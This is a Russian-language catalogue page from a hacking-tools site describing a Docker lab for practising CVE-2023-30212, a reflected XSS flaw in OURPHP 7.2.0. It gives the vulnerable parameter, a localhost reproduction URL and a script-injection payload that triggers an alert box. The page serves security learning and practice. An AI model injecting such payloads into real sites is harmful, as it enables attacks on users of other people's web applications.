Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-30212-POC-DOCKER-FILE — Этот репозиторий предоставляет Docker-контейнер для моделирования уязвимости CVE-2023-30212, позволяя вам практиковаться и понять её воздействие. Он включает подробное руководство, которое поможет вам развернуть контейнер на вашем собственном компьютере. Также включена документация по процессу создания Docker-контейнера. | Kitploit
Инструменты/GitHubGitHub/rishipatidar/cve-2023-30212-poc-docker-file
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьОбучение и ОбразованиеЛаборатории и Практика
GitHubrishipatidar/cve-2023-30212-poc-docker-file

CVE-2023-30212-POC-DOCKER-FILE

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот репозиторий предоставляет Docker-контейнер для моделирования уязвимости CVE-2023-30212, позволяя вам практиковаться и понять её воздействие. Он включает подробное руководство, которое поможет вам развернуть контейнер на вашем собственном компьютере. Также включена документация по процессу создания Docker-контейнера.

113 лет назадЕщё не проверено
Поделиться

CVE-2023-30212 POC : Межсайтовый скриптинг

через /client/manage/ourphp_out.php

Продукты, затронутые CVE-2023-30212 :

ВендорПродуктВерсия
ourphpourphp7.2.0

Руководство по установке Docker :

Для установки OURPHP <= 7.2.0 в docker вы можете воспользоваться руководство для установки docker в целях практики.

Описание уязвимости:

root@kitploit:~
# Версия ourphp 7.2.0 имеет уязвимость XSS (межсайтовый скриптинг).
# В файле /client/manage/ourphp_out.php присутствует прямой вывод, который вместе с контролируемыми переменными позволяет злоумышленникам выполнить XSS-код. Когда параметр ourphp_admin установлен в "logout", мы выводим контролируемую переменную "out".
# Для эксплуатации мы добавляем тег script и закрываем его, формируя полезную нагрузку. Эта уязвимость может быть использована через параметр "out" путем внедрения следующего скрипта: "</script><script>alert(xss)</script>"

Шаги для воспроизведения проблемы:

root@kitploit:~
# После завершения установки docker напрямую. Перейдите по следующему пути :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

Полезная нагрузка для уязвимости:

root@kitploit:~
# </script><script>alert(`xss`)</script>

Видео

CVE-2023-30212

Ссылки

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> Код для справки
Скачать инструмент